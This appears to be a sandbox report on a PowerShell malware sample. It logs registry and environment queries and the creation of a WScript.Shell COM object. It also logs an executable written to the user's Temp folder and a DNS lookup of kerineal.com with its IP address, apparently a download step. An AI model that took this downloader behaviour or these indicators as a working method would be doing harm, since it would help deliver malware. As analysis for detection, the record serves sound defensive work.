| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\ATVeyDl98Z |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\ATVeyDl98Z |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session |
|
1 | ||
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
21 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = TEMP, result_out = C:\Users\ATVEYD~1\AppData\Local\Temp |
|
2 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = ZJEWV7F |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = kerineal.com, address_out = 184.168.152.148 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
